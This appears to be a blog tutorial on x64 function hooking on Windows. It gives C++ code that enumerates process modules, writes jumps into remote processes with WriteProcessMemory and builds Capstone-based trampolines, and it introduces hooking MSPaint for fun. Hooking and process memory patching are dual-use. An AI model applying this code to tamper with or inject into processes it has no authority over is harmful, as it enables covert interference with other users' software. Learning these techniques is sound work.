  BOOL success = EnumProcessModules(process, remoteProcessModules, sizeof(HMODULE) * 1024, &numBytesWrittenInModuleArray);

  if (!success)
  {
    fprintf(stderr, "Error enumerating modules on target process. Error Code %lu \n", GetLastError());
    DebugBreak();
  }

  DWORD numRemoteModules = numBytesWrittenInModuleArray / sizeof(HMODULE);
  HMODULE remoteProcessModule = 0; //An HMODULE is just the DLL's base address 

  for (DWORD i = 0; i < numRemoteModules; ++i)
  {
    CHAR moduleName[256];
    CHAR absoluteModuleName[256];
    GetModuleFileNameEx(process, remoteProcessModules[i], moduleName, 256);

    //the following string operations are to account for cases where GetModuleFileNameEx
    //returns a relative path rather than an absolute one, the path we get to the module
    //is using a virtual drive letter (ie: one created by subst) rather than a real drive
    char* err = _fullpath(absoluteModuleName, moduleName, 256);
    check(err);
    printf("%s\n", absoluteModuleName);
  }
}

HMODULE GetBaseModuleForProcess(HANDLE process)
{
  HMODULE remoteProcessModules[1024];
  DWORD numBytesWrittenInModuleArray = 0;
  BOOL success = EnumProcessModules(process, remoteProcessModules, sizeof(HMODULE) * 1024, &numBytesWrittenInModuleArray);

  if (!success)
  {
    fprintf(stderr, "Error enumerating modules on target process. Error Code %lu \n", GetLastError());
    DebugBreak();
  }

  DWORD numRemoteModules = numBytesWrittenInModuleArray / sizeof(HMODULE);
  CHAR remoteProcessName[256];
  GetModuleFileNameEx(process, NULL, remoteProcessName, 256); //a null module handle gets the process name
  _strlwr_s(remoteProcessName, 256);

  MODULEINFO remoteProcessModuleInfo;
  HMODULE remoteProcessModule = 0; //An HMODULE is just the DLL's base address 

  for (DWORD i = 0; i < numRemoteModules; ++i)
  {
    CHAR moduleName[256];
    CHAR absoluteModuleName[256];
    CHAR rebasedPath[256] = { 0 };
    GetModuleFileNameEx(process, remoteProcessModules[i], moduleName, 256);

    //the following string operations are to account for cases where GetModuleFileNameEx
    //returns a relative path rather than an absolute one, the path we get to the module
    //is using a virtual drive letter (ie: one created by subst) rather than a real drive
    char* err = _fullpath(absoluteModuleName, moduleName, 256);
    check(err);

    RebaseVirtualDrivePath(absoluteModuleName, rebasedPath, 256);
    _strlwr_s(rebasedPath, 256);

    if (strcmp(remoteProcessName, rebasedPath) == 0)
    {
      remoteProcessModule = remoteProcessModules[i];

      success = GetModuleInformation(process, remoteProcessModules[i], &remoteProcessModuleInfo, sizeof(MODULEINFO));
      if (!success)
      {
        fprintf(stderr, "Error getting module information for remote process module\n");
        DebugBreak();
      }
      break;
    }
  }

  return remoteProcessModule;
}

DWORD FindPidByName(const char* name)
{
  HANDLE h;
  PROCESSENTRY32 singleProcess;
  h = CreateToolhelp32Snapshot( //takes a snapshot of specified processes
    TH32CS_SNAPPROCESS, //get all processes
    0); //ignored for SNAPPROCESS

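  singleProcess.dwSize = sizeof(PROCESSENTRY32);

  //Process32First fills in the first entry, without it the first loop
  //iteration would compare against uninitialized memory
  if (!Process32First(h, &singleProcess))
  {
    CloseHandle(h);
    return 0;
  }

  do {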

    if (strcmp(singleProcess.szExeFile, name) == 0)
    {
      DWORD pid = singleProcess.th32ProcessID;
      CloseHandle(h);
      return pid;
    }

  } while (Process32Next(h, &singleProcess));

  CloseHandle(h);

  return 0;
}

uint32_t WriteMovToRCX(uint8_t* dst, uint64_t val)
{
  check(IsProcess64Bit(GetCurrentProcess()));

  uint8_t movAsmBytes[] =
  {
    0x48, 0xB9, 0xAA, 0xAA, 0xAA, 0xAA, 0xAA, 0xAA, 0xAA, 0xAA, //movabs 64 bit value into rcx
  };
  memcpy(&movAsmBytes[2], &val, sizeof(uint64_t));
  memcpy(dst, &movAsmBytes, sizeof(movAsmBytes));

  return sizeof(movAsmBytes);

}

uint32_t WriteSaveArgumentRegisters(uint8_t* dst)
{
  uint8_t asmBytes[] =
  {
    0x51, //push rcx
    0x52, //push rdx
    0x41, 0x50, //push r8
    0x41, 0x51, //push r9
    0x48, 0x83, 0xEC, 0x40, //sub rsp, 64 -> space for xmm registers
    0x0F, 0x11, 0x04, 0x24, // movups xmmword ptr [rsp],xmm0
    0x0F, 0x11, 0x4C, 0x24, 0x10, //movups xmmword ptr [rsp+10h],xmm1
    0x0F, 0x11, 0x54, 0x24, 0x20, //movups xmmword ptr [rsp+20h],xmm2
    0x0F, 0x11, 0x5C, 0x24, 0x30 //movups  xmmword ptr [rsp+30h],xmm3
  };

  memcpy(dst, &asmBytes, sizeof(asmBytes));
  return sizeof(asmBytes);
}

uint32_t WriteRestoreArgumentRegisters(uint8_t* dst)
{

  uint8_t asmBytes[] =
  {
    0x0F, 0x10, 0x04, 0x24, //movups xmm0,xmmword ptr[rsp]
    0x0F, 0x10, 0x4C, 0x24, 0x10,//movups xmm1,xmmword ptr[rsp + 10h]
    0x0F, 0x10, 0x54, 0x24, 0x20,//movups xmm2,xmmword ptr[rsp + 20h]
    0x0F, 0x10, 0x5C, 0x24, 0x30,//movups xmm3,xmmword ptr[rsp + 30h]
    0x48, 0x83, 0xC4, 0x40,//add rsp,40h
    0x41, 0x59,//pop r9
    0x41, 0x58,//pop r8
    0x5A,//pop rdx
    0x59 //pop rcx
  };

  memcpy(dst, &asmBytes, sizeof(asmBytes));
  return sizeof(asmBytes);
}

uint32_t WriteAddRSP32(uint8_t* dst)
{
  uint8_t addAsmBytes[] =
  {
    0x48, 0x83, 0xC4, 0x20
  };
  memcpy(dst, &addAsmBytes, sizeof(addAsmBytes));
  return sizeof(addAsmBytes);
}

uint32_t WriteSubRSP32(uint8_t* dst)
{
  uint8_t subAsmBytes[] =
  {
    0x48, 0x83, 0xEC, 0x20
  };
  memcpy(dst, &subAsmBytes, sizeof(subAsmBytes));
  return sizeof(subAsmBytes);
}

uint32_t WriteAbsoluteCall64(uint8_t* dst, void* funcToCall)
{
  check(IsProcess64Bit(GetCurrentProcess()));

  uint8_t callAsmBytes[] =
  {
    0x49, 0xBA, 0xAA, 0xAA, 0xAA, 0xAA, 0xAA, 0xAA, 0xAA, 0xAA, //movabs 64 bit value into r10
    0x41, 0xFF, 0xD2, //call r10
  };
  memcpy(&callAsmBytes[2], &funcToCall, sizeof(void*));
  memcpy(dst, &callAsmBytes, sizeof(callAsmBytes));

  return sizeof(callAsmBytes);
}

uint32_t WriteAbsoluteJump64(void* absJumpMemory, void* addrToJumpTo)
{
  check(IsProcess64Bit(GetCurrentProcess()));

  //this writes the absolute jump instructions into the memory allocated near the target
  //the E9 jump installed in the target function (GetNum) will jump to here
  uint8_t absJumpInstructions[] = { 0x49, 0xBA, 0xAA, 0xAA, 0xAA, 0xAA, 0xAA, 0xAA, 0xAA, 0xAA, //mov 64 bit value into r10
                    0x41, 0xFF, 0xE2 }; //jmp r10

  uint64_t addrToJumpTo64 = (uint64_t)addrToJumpTo;
  memcpy(&absJumpInstructions[2], &addrToJumpTo64, sizeof(addrToJumpTo64));
  memcpy(absJumpMemory, absJumpInstructions, sizeof(absJumpInstructions));
  return sizeof(absJumpInstructions);
}

uint32_t WriteAbsoluteJump64(HANDLE process, void* absJumpMemory, void* addrToJumpTo)
{
  check(IsProcess64Bit(process));

  //this writes the absolute jump instructions into the memory allocated near the target
  //the E9 jump installed in the target function (GetNum) will jump to here
  uint8_t absJumpInstructions[] = { 0x49, 0xBA, 0xAA, 0xAA, 0xAA, 0xAA, 0xAA, 0xAA, 0xAA, 0xAA, //mov 64 bit value into r10
                      0x41, 0xFF, 0xE2 }; //jmp r10

  uint64_t addrToJumpTo64 = (uint64_t)addrToJumpTo;
  memcpy(&absJumpInstructions[2], &addrToJumpTo64, sizeof(addrToJumpTo64));

  WriteProcessMemory(process, absJumpMemory, absJumpInstructions, sizeof(absJumpInstructions), nullptr);
  return sizeof(absJumpInstructions);
}

uint32_t WriteRelativeJump(void* func2hook, void* jumpTarget)
{
  uint8_t jmpInstruction[5] = { 0xE9, 0x0, 0x0, 0x0, 0x0 };

  int64_t relativeToJumpTarget64 = (int64_t)jumpTarget - ((int64_t)func2hook + 5);
  check(relativeToJumpTarget64 >= INT32_MIN && relativeToJumpTarget64 <= INT32_MAX); //backwards jumps need a range check too

  int32_t relativeToJumpTarget = (int32_t)relativeToJumpTarget64;

  memcpy(jmpInstruction + 1, &relativeToJumpTarget, 4);

  DWORD oldProtect;
  bool err = VirtualProtect(func2hook, 1024, PAGE_EXECUTE_READWRITE, &oldProtect);
  check(err);

  memcpy(func2hook, jmpInstruction, sizeof(jmpInstruction));
  return sizeof(jmpInstruction);

}

uint32_t WriteRelativeJump(void* func2hook, void* jumpTarget, uint8_t numTrailingNOPs)
{
  uint8_t jmpInstruction[5] = { 0xE9, 0x0, 0x0, 0x0, 0x0 };

  int64_t relativeToJumpTarget64 = (int64_t)jumpTarget - ((int64_t)func2hook + 5);
  check(relativeToJumpTarget64 >= INT32_MIN && relativeToJumpTarget64 <= INT32_MAX); //backwards jumps need a range check too

  int32_t relativeToJumpTarget = (int32_t)relativeToJumpTarget64;

  memcpy(jmpInstruction + 1, &relativeToJumpTarget, 4);

  DWORD oldProtect;
  bool err = VirtualProtect(func2hook, 1024, PAGE_EXECUTE_READWRITE, &oldProtect);
  check(err);

  memcpy(func2hook, jmpInstruction, sizeof(jmpInstruction));

  uint8_t* byteFunc2Hook = (uint8_t*)func2hook;
  for (int i = 0; i < numTrailingNOPs; ++i)
  {
    memset((void*)(byteFunc2Hook + 5 + i), 0x90, 1);
  }

  return sizeof(jmpInstruction) + numTrailingNOPs;
}


uint32_t WriteRelativeJump(HANDLE process, void* func2hook, void* jumpTarget)
{
  uint8_t jmpInstruction[5] = { 0xE9, 0x0, 0x0, 0x0, 0x0 };

  int64_t relativeToJumpTarget64 = (int64_t)jumpTarget - ((int64_t)func2hook + 5);
  check(relativeToJumpTarget64 >= INT32_MIN && relativeToJumpTarget64 <= INT32_MAX); //backwards jumps need a range check too

  int32_t relativeToJumpTarget = (int32_t)relativeToJumpTarget64;

  memcpy(jmpInstruction + 1, &relativeToJumpTarget, 4);

  DWORD oldProtect;
  bool err = VirtualProtectEx(process, func2hook, 1024, PAGE_EXECUTE_READWRITE, &oldProtect);
  check(err);

  err = WriteProcessMemory(process, func2hook, jmpInstruction, sizeof(jmpInstruction), nullptr);
  check(err);

  return sizeof(jmpInstruction);
}

HMODULE FindModuleBaseAddress(HANDLE process, const char* targetModule)
{
  HMODULE hMods[1024];
  DWORD cbNeeded;

  if (EnumProcessModules(process, hMods, sizeof(hMods), &cbNeeded))
  {
    for (uint32_t i = 0; i < (cbNeeded / sizeof(HMODULE)); i++)
    {
      TCHAR moduleName[MAX_PATH];

      // Get the full path to the module's file.

      if (GetModuleFileNameEx(process, hMods[i], moduleName,
        sizeof(moduleName) / sizeof(TCHAR)))
      {
        // Return the first module whose full path contains the target name.
        if (strstr(moduleName, targetModule) != nullptr)
        {
          return hMods[i];
        }
      }
    }
  }

  return NULL;
}

void* FindAddressOfRemoteDLLFunction(HANDLE process, const char* dllName, const char* funcName)
{
  //first, load the dll into this process so we can use GetProcAddress to determine the offset
  //of the target function from the DLL base address
  HMODULE localDLL = LoadLibraryEx(dllName, NULL, 0);
  check(localDLL);
  void* localHookFunc = GetProcAddress(localDLL, funcName);
  check(localHookFunc);

  uint64_t offsetOfHookFunc = (uint64_t)localHookFunc - (uint64_t)localDLL;
  FreeLibrary(localDLL); //free the library, we don't need it anymore.

  //Technically, we could just use the result of GetProcAddress, since in 99% of cases, the base address of the dll
  //in the two processes will be shared thanks to ASLR, but just in case the remote process has relocated the dll, 
  //I'm getting it here separately.

  HMODULE remoteModuleBase = FindModuleBaseAddress(process, dllName);

  return (void*)((uint64_t)remoteModuleBase + offsetOfHookFunc);
}

void SetOtherThreadsSuspended(bool suspend)
{
  HANDLE hSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPTHREAD, 0);
  if (hSnapshot != INVALID_HANDLE_VALUE)
  {
    THREADENTRY32 te;
    te.dwSize = sizeof(THREADENTRY32);
    if (Thread32First(hSnapshot, &te))
    {
      do
      {
        if (te.dwSize >= (FIELD_OFFSET(THREADENTRY32, th32OwnerProcessID) + sizeof(DWORD))
          && te.th32OwnerProcessID == GetCurrentProcessId()
          && te.th32ThreadID != GetCurrentThreadId())
        {

          HANDLE thread = ::OpenThread(THREAD_ALL_ACCESS, FALSE, te.th32ThreadID);
          if (thread != NULL)
          {
            if (suspend)
            {
              SuspendThread(thread);
            }
            else
            {
              ResumeThread(thread);
            }
            CloseHandle(thread);
          }
        }
      } while (Thread32Next(hSnapshot, &te));
    }
    CloseHandle(hSnapshot); //release the snapshot handle so it doesn't leak on every call
  }
}

struct X64Instructions
{
  cs_insn* instructions;
  uint32_t numInstructions;
  uint32_t numBytes;
};

X64Instructions StealBytes(void* function)
{
  // Disassemble stolen bytes
  csh handle;
  cs_open(CS_ARCH_X86, CS_MODE_64, &handle);
  cs_option(handle, CS_OPT_DETAIL, CS_OPT_ON); // turn ON detail feature with CS_OPT_ON

  size_t count;
  cs_insn* disassembledInstructions; //allocated by cs_disasm, needs to be manually freed later
  count = cs_disasm(handle, (uint8_t*)function, 20, (uint64_t)function, 20, &disassembledInstructions);

  //get the instructions covered by the first 5 bytes of the original function
  uint32_t byteCount = 0;
  uint32_t stolenInstrCount = 0;
  for (int32_t i = 0; i < count; ++i)
  {
    cs_insn& inst = disassembledInstructions[i];
    byteCount += inst.size;
    stolenInstrCount++;
    if (byteCount >= 5) break;
  }

  //replace stolen instructions in target func with NOPs, so that when we jump
  //back to the target function, we don't have to care about how many
  //bytes were stolen
  memset(function, 0x90, byteCount);

  cs_close(&handle);
  return { disassembledInstructions, stolenInstrCount, byteCount };
}

bool IsRelativeJump(cs_insn& inst)
{
  bool isAnyJumpInstruction = inst.id >= X86_INS_JAE && inst.id <= X86_INS_JS;
  bool isJmp = inst.id == X86_INS_JMP;
  bool startsWithEBorE9 = inst.bytes[0] == 0xEB || inst.bytes[0] == 0xE9;
  return isJmp ? startsWithEBorE9 : isAnyJumpInstruction;
}

bool IsRelativeCall(cs_insn& inst)
{
  bool isCall = inst.id == X86_INS_CALL;
  bool startsWithE8 = inst.bytes[0] == 0xE8;
  return isCall && startsWithE8;
}

bool IsRIPRelativeInstr(cs_insn& inst)
{
  cs_x86* x86 = &(inst.detail->x86);

  for (uint32_t i = 0; i < inst.detail->x86.op_count; i++)
  {
    cs_x86_op* op = &(x86->operands[i]);

    //mem type is rip relative, like lea rcx,[rip+0xbeef]
    if (op->type == X86_OP_MEM)
    {
      //if we're relative to rip
      return op->mem.base == X86_REG_RIP;
    }
  }

  return false;
}

template<class T>
T GetDisplacement(cs_insn* inst, uint8_t offset)
{
  T disp;
  memcpy(&disp, &inst->bytes[offset], sizeof(T));
  return disp;
}

//rewrite instruction bytes so that any RIP-relative displacement operands
//make sense with wherever we're relocating to
void RelocateInstruction(cs_insn* inst, void* dstLocation)
{
  cs_x86* x86 = &(inst->detail->x86);
  uint8_t offset = x86->encoding.disp_offset;

  uint64_t displacement = inst->bytes[x86->encoding.disp_offset];
  switch (x86->encoding.disp_size)
  {
  case 1:
  {
    int8_t disp = GetDisplacement<uint8_t>(inst, offset);
    disp -= int8_t(uint64_t(dstLocation) - inst->address);
    memcpy(&inst->bytes[offset], &disp, 1);
  }break;

  case 2:
  {
    int16_t disp = GetDisplacement<uint16_t>(inst, offset);
    disp -= int16_t(uint64_t(dstLocation) - inst->address);
    memcpy(&inst->bytes[offset], &disp, 2);
  }break;

  case 4:
  {
    int32_t disp = GetDisplacement<int32_t>(inst, offset);
    disp -= int32_t(uint64_t(dstLocation) - inst->address);
    memcpy(&inst->bytes[offset], &disp, 4);
  }break;
  }
}


//relative jump instructions need to be rewritten so that they jump to the appropriate
//place in the Absolute Instruction Table. Since we want to preserve any conditional
//jump logic, this func rewrites the instruction's operand bytes only. 
void RewriteStolenJumpInstruction(cs_insn* instr, uint8_t* instrPtr, uint8_t* absTableEntry)
{
  uint8_t distToJumpTable = uint8_t(absTableEntry - (instrPtr + instr->size));

  //jmp instructions can have a 1 or 2 byte opcode, and need a 1-4 byte operand
  //rewrite the operand for the jump to go to the jump table
  uint8_t instrByteSize = instr->bytes[0] == 0x0F ? 2 : 1;
  uint8_t operandSize = instr->size - instrByteSize;

  switch (operandSize)
  {
  case 1: instr->bytes[instrByteSize] = distToJumpTable; break;
  case 2: {uint16_t dist16 = distToJumpTable; memcpy(&instr->bytes[instrByteSize], &dist16, 2); } break;
  case 4: {uint32_t dist32 = distToJumpTable; memcpy(&instr->bytes[instrByteSize], &dist32, 4); } break;
  }
}

//relative call instructions need to be rewritten as jumps to the appropriate
//place in the Absolute Instruction Table. Since we want to preserve the length
//of the call instruction, we first replace all the instruction's bytes with 1 byte
//NOPs, before writing a 2 byte jump to the start
void RewriteStolenCallInstruction(cs_insn* instr, uint8_t* instrPtr, uint8_t* absTableEntry)
{
  uint32_t numNOPs = instr->size - 2;
  uint8_t distToJumpTable = uint8_t(absTableEntry - (instrPtr + instr->size - numNOPs));

  //calls need to be rewritten as relative jumps to the abs table
  //but we want to preserve the length of the instruction, so pad with NOPs
  uint8_t jmpBytes[2] = { 0xEB, distToJumpTable };
  memset(instr->bytes, 0x90, instr->size);
  memcpy(instr->bytes, jmpBytes, sizeof(jmpBytes));
}

uint32_t AddJmpToAbsTable(cs_insn& jmp, uint8_t* absTableMem)
{
  char* targetAddrStr = jmp.op_str; //where the instruction intended to go
  uint64_t targetAddr = _strtoui64(targetAddrStr, NULL, 0);
  return WriteAbsoluteJump64(absTableMem, (void*)targetAddr);
}

uint32_t AddCallToAbsTable(cs_insn& call, uint8_t* absTableMem, uint8_t* jumpBackToHookedFunc)
{
  char* targetAddrStr = call.op_str; //where the instruction intended to go
  uint64_t targetAddr = _strtoui64(targetAddrStr, NULL, 0);

  uint8_t* dstMem = absTableMem;

  uint8_t callAsmBytes[] =
  {
    0x49, 0xBA, 0xAA, 0xAA, 0xAA, 0xAA, 0xAA, 0xAA, 0xAA, 0xAA, //movabs 64 bit value into r10
    0x41, 0xFF, 0xD2, //call r10
  };
  memcpy(&callAsmBytes[2], &targetAddr, sizeof(void*));
  memcpy(dstMem, &callAsmBytes, sizeof(callAsmBytes));
  dstMem += sizeof(callAsmBytes);

  //after the call, we need to add a second 2 byte jump, which will jump back to the
  //final jump of the stolen bytes
  uint8_t jmpBytes[2] = { 0xEB, uint8_t(jumpBackToHookedFunc - (dstMem + sizeof(jmpBytes))) };
  memcpy(dstMem, jmpBytes, sizeof(jmpBytes));

  return sizeof(callAsmBytes) + sizeof(jmpBytes); //15
}


/*build a "jump - sandwich" style trampoline. This style of trampoline has three sections:

    |----------------------------|
    |Stolen Instructions         |
    |----------------------------|
    |Jump back to target func    |
    |----------------------------|
    |Absolute Instruction Table  |
    |----------------------------|

Relative instructions in the stolen instructions section need to be rewritten as absolute
instructions which jump/call to the intended target address of those instructions (since they've
been relocated). Absolute versions of these instructions are added to the absolute instruction
table. The relative instruction in the stolen instructions section get rewritten to relative
jumps to the corresponding instructions in the absolute instruction table.
*/

uint32_t BuildTrampoline(void* func2hook, void* dstMemForTrampoline)
{
  X64Instructions stolenInstrs = StealBytes(func2hook);

  uint8_t* stolenByteMem = (uint8_t*)dstMemForTrampoline;
  uint8_t* jumpBackMem = stolenByteMem + stolenInstrs.numBytes;
  uint8_t* absTableMem = jumpBackMem + 13; //13 is the size of a 64 bit mov/jmp instruction pair

  for (uint32_t i = 0; i < stolenInstrs.numInstructions; ++i)
  {
    cs_insn& inst = stolenInstrs.instructions[i];
    if (inst.id >= X86_INS_LOOP && inst.id <= X86_INS_LOOPNE)
    {
      return 0; //bail out on loop instructions, I don't have a good way of handling them 
    }

    if (IsRelativeJump(inst))
    {
      uint32_t aitSize = AddJmpToAbsTable(inst, absTableMem);
      RewriteStolenJumpInstruction(&inst, stolenByteMem, absTableMem);
      absTableMem += aitSize;
    }
    else if (IsRelativeCall(inst))
    {
      uint32_t aitSize = AddCallToAbsTable(inst, absTableMem, jumpBackMem);
      RewriteStolenCallInstruction(&inst, stolenByteMem, absTableMem);
      absTableMem += aitSize;
    }
    else if (IsRIPRelativeInstr(inst))
    {
      RelocateInstruction(&inst, stolenByteMem);
    }

    memcpy(stolenByteMem, inst.bytes, inst.size);
    stolenByteMem += inst.size;
  }

  WriteAbsoluteJump64(jumpBackMem, (uint8_t*)func2hook + 5);
  free(stolenInstrs.instructions);

  return uint32_t((uint8_t*)absTableMem - (uint8_t*)dstMemForTrampoline);
}


void PushAddress(uint64_t addr) //push the address of the jump target
{
  hookJumpAddresses.push(addr);
}

//we absolutely don't want this inlined
__declspec(noinline) void PopAddress(uint64_t trampolinePtr)
{
  uint64_t addr = hookJumpAddresses.top();
  hookJumpAddresses.pop();
  memcpy((void*)trampolinePtr, &addr, sizeof(uint64_t));
}


void InstallHook(void* func2hook, void* payloadFunc)
{
  SetOtherThreadsSuspended(true);

  DWORD oldProtect;
  VirtualProtect(func2hook, 1024, PAGE_EXECUTE_READWRITE, &oldProtect);

  //102 is the size of the "pre-payload" instructions that are written below
  //the trampoline will be located after these instructions in memory
  void* hookMemory = AllocatePageNearAddress(func2hook);

  uint32_t trampolineSize = BuildTrampoline(func2hook, (void*)((char*)hookMemory + 102));

  uint8_t* memoryIter = (uint8_t*)hookMemory;
  uint64_t trampolineAddress = (uint64_t)(memoryIter)+102;

  memoryIter += WriteSaveArgumentRegisters(memoryIter);
  memoryIter += WriteMovToRCX(memoryIter, trampolineAddress);
  memoryIter += WriteSubRSP32(memoryIter); //allocate home space for function call
  memoryIter += WriteAbsoluteCall64(memoryIter, &PushAddress);
  memoryIter += WriteAddRSP32(memoryIter);
  memoryIter += WriteRestoreArgumentRegisters(memoryIter);
  memoryIter += WriteAbsoluteJump64(memoryIter, payloadFunc);

  //create the relay function
  void* relayFuncMemory = memoryIter + trampolineSize;
  WriteAbsoluteJump64(relayFuncMemory, hookMemory); //write relay func instructions

  //install the hook
  uint8_t jmpInstruction[5] = { 0xE9, 0x0, 0x0, 0x0, 0x0 };
  const int32_t relAddr = int32_t((int64_t)relayFuncMemory - ((int64_t)func2hook + sizeof(jmpInstruction)));
  memcpy(jmpInstruction + 1, &relAddr, 4);
  memcpy(func2hook, jmpInstruction, sizeof(jmpInstruction));

  SetOtherThreadsSuspended(false);
}
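
The 102 used as the trampoline offset in InstallHook() above can be sanity-checked by adding up the size of each stub in the order it gets written. This is only a sketch: the constant names are made up for illustration, and two of the sizes are assumptions (that the save stub is the same length as the restore stub, and that WriteMovToRCX emits a 10 byte mov with a 64 bit immediate). The other sizes are counted from the byte arrays in the listing.

```cpp
#include <cassert>
#include <cstdint>

// Byte counts of each stub, in the order InstallHook() writes them.
// All names here are hypothetical, they only exist for this check.
constexpr uint32_t kSaveArgRegs    = 29; // ASSUMPTION: same length as the restore stub
constexpr uint32_t kMovToRCX       = 10; // ASSUMPTION: 2 opcode bytes + 8 byte immediate
constexpr uint32_t kSubRSP32       = 4;  // 48 83 EC 20
constexpr uint32_t kAbsoluteCall64 = 13; // mov r10, imm64 (10) + call r10 (3)
constexpr uint32_t kAddRSP32       = 4;  // 48 83 C4 20
constexpr uint32_t kRestoreArgRegs = 29; // 4 movups (19) + add rsp (4) + 4 pops (6)
constexpr uint32_t kAbsoluteJump64 = 13; // mov r10, imm64 (10) + jmp r10 (3)

constexpr uint32_t PrePayloadSize()
{
  return kSaveArgRegs + kMovToRCX + kSubRSP32 + kAbsoluteCall64
       + kAddRSP32 + kRestoreArgRegs + kAbsoluteJump64;
}

// fails to compile if any stub changes size without the offset being updated
static_assert(PrePayloadSize() == 102, "trampoline offset no longer matches the stubs");
```

A check like this is cheap insurance, since editing any of the stubs without updating the hard coded offset would put the trampoline on top of the pre-payload instructions.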

Wrap Up

This was a fun project to work on, and I feel like all of these hooking/hacking related projects have taught me an awful lot about stuff that I took for granted before. Hopefully it was as much fun to read about as it was to figure out. Who knows, maybe one day you’ll need to add an obnoxious triangle to a third party binary and some of this will come in handy.

I’ve got nothing else interesting to say so I guess that means it’s time to plug my Twitter handle (@khalladay) and share a couple links I found helpful while figuring out how to make this project work. Enjoy!

X64 Function Hooking by Example

2020-11-13T00:00:00+00:00

I’ve spent some time recently figuring out how function hooking works. There are tons of great resources available about it, but I’ve noticed that a lot of them are really light on providing example code, and the ones that do provide code tend to link to fully mature hooking frameworks. Usually the linked projects are really impressive, but they aren’t the easiest places to learn the basics from.

Now that I know enough to be dangerous, it seemed like fun to rectify this lack of sample code by building some hooking code from the ground up and walking through how to use that code to hook a running program. My past two blog posts were about making Notepad do weird stuff, so for the sake of variety, this post is going to pick on MSPaint instead.

I’m going to explain how to build 4 example programs. Two of them will show off fundamental hooking concepts by hooking functions in the example code itself. The other two will use those same concepts to hook MSPaint and make it disable the “Edit With Paint3D” button in a running MSPaint instance and force it to always draw with my favourite color (orange).

If you’re only interested in sample code, I’ve published a github repo called Hooking-by-Example which has 14 increasingly complex example programs that demonstrate how function hooking works (or at least, the bits of it that I’ve figured out). Everything that I talk about here (and more) is also demonstrated by the programs in that repo.

WTF is Function Hooking?

Function Hooking is a programming technique that lets you intercept and redirect function calls in a running application, allowing you to change that program’s runtime behaviour in ways that may not have been intended when the program was initially compiled. It’s a little bit like when a dog gets into a car thinking they’re going to the park and ends up at the vet instead. The dog called goToPark(), but unexpectedly ended up inside goToVet(). This example isn’t great.

The real fun of function hooking is that you can use it to change the behaviour of programs that you don’t have the source code to, or otherwise can’t recompile. Combined with process injection (which I explained a bit in my last post), you can use function hooks to add entirely new behaviour to any program that you can run on your pc. For example, ReShade uses function hooking to add new postprocessing effects to games, and RenderDoc uses a form of hooking (although not the kind covered here) to allow you to debug graphics code in running applications.

More examples of things you might want to do with function hooking include:

Logging or replacing function arguments
Disabling functions
Measuring the execution time of a function
Monitoring or replacing data before it gets sent over a network

The only limits are your imagination and ability to read assembly!
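
To make one item from that list concrete, here is a rough sketch of what a timing payload could look like. Nothing in it installs a hook: SlowAdd, g_original and TimedAddPayload are hypothetical names, and the g_original function pointer is only a stand-in for whatever mechanism would let a real payload call the original function.

```cpp
#include <cassert>
#include <chrono>
#include <cstdint>
#include <cstdio>

using AddFn = uint32_t(*)(uint32_t, uint32_t);

// stand-in for the function that would be hooked
uint32_t SlowAdd(uint32_t a, uint32_t b)
{
  return a + b;
}

// HYPOTHETICAL: in a real hook this would point at a way to run the original code
AddFn g_original = &SlowAdd;
uint32_t g_callCount = 0;

// payload with the same signature as the target: time the original, log it, pass the result through
uint32_t TimedAddPayload(uint32_t a, uint32_t b)
{
  auto start = std::chrono::steady_clock::now();
  uint32_t result = g_original(a, b);
  auto elapsed = std::chrono::steady_clock::now() - start;

  ++g_callCount;
  long long ns = static_cast<long long>(
    std::chrono::duration_cast<std::chrono::nanoseconds>(elapsed).count());
  std::printf("call %u took %lld ns\n", g_callCount, ns);

  return result;
}
```

The important detail is that the payload has exactly the same signature as the function it replaces, so callers can't tell the difference apart from the extra logging.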

How Does It Work?

Let’s say we have a function that adds two Gdiplus::ARGB values together, and we want to use a hook to bypass the addition logic and always return red. The ARGB type is a DWORD that uses a byte for Alpha, Red, Green, and Blue, respectively. Adding two of them together might look like this:

Gdiplus::ARGB AddColors(Gdiplus::ARGB left, Gdiplus::ARGB right)
{
  uint32_t a = min(0xFF000000, (left & 0xFF000000) + (right & 0xFF000000));
  uint32_t r = min(0x00FF0000, (left & 0x00FF0000) + (right & 0x00FF0000));
  uint32_t g = min(0x0000FF00, (left & 0x0000FF00) + (right & 0x0000FF00));
  uint32_t b = min(0x000000FF, (left & 0x000000FF) + (right & 0x000000FF));

  return a | r | g | b;
}

The function that we want to replace it with (which I’ll call the “payload” function), looks like this:

Gdiplus::ARGB ReturnRed(Gdiplus::ARGB left, Gdiplus::ARGB right)
{
    return 0xffff0000;  
}

If this was in your own code, you’d add a “return ReturnRed(left, right)” call to the beginning of AddColors(), recompile and call it a day, but what if you couldn’t recompile it? For example, what if it’s part of a closed source third party library, or the program that calls AddColors() is already running?

Rather than recompiling, we can use hooking to modify its instruction bytes instead, and replace the first instruction in AddColors() with a jmp to the beginning of the ReturnRed() function. This works even if the function we want to hook comes from a system dll, since DLL code segments are copy-on-write, so there’s no chance of a hook interfering with other processes.

Imagine that the first instruction in ReturnRed() is located 1024 bytes after AddColors() in memory. In assembly, replacing AddColors’ instructions with a jump will look like this:

The jump instruction used here is a relative jump with a 32 bit operand. The opcode is E9, and that’s followed by a 4 byte value that represents how many bytes to jump.
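
The operand for that jump can be worked out by hand. The sketch below uses a hypothetical helper, EncodeRelativeJump, and made-up addresses to show the arithmetic: the offset is measured from the end of the 5 byte jmp, not from its start.

```cpp
#include <array>
#include <cassert>
#include <cstdint>
#include <cstring>

// Build the 5 bytes of an E9 (jmp rel32) instruction.
// hookAddr:   address of the first byte being overwritten
// targetAddr: address the jump should land on
// (hypothetical helper, for illustration only)
std::array<uint8_t, 5> EncodeRelativeJump(uint64_t hookAddr, uint64_t targetAddr)
{
  std::array<uint8_t, 5> bytes = { 0xE9, 0x00, 0x00, 0x00, 0x00 };

  // the operand is relative to the instruction AFTER the jmp, so account for its 5 bytes
  int64_t delta = static_cast<int64_t>(targetAddr)
                - static_cast<int64_t>(hookAddr + bytes.size());
  assert(delta >= INT32_MIN && delta <= INT32_MAX);
  int32_t rel = static_cast<int32_t>(delta);

  // x86 is little-endian, so copying the int32 writes the low byte first
  std::memcpy(bytes.data() + 1, &rel, sizeof(rel));
  return bytes;
}
```

For the 1024 byte case described above, EncodeRelativeJump(0x1000, 0x1400) gives E9 FB 03 00 00, because 1024 - 5 = 1019 = 0x3FB.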

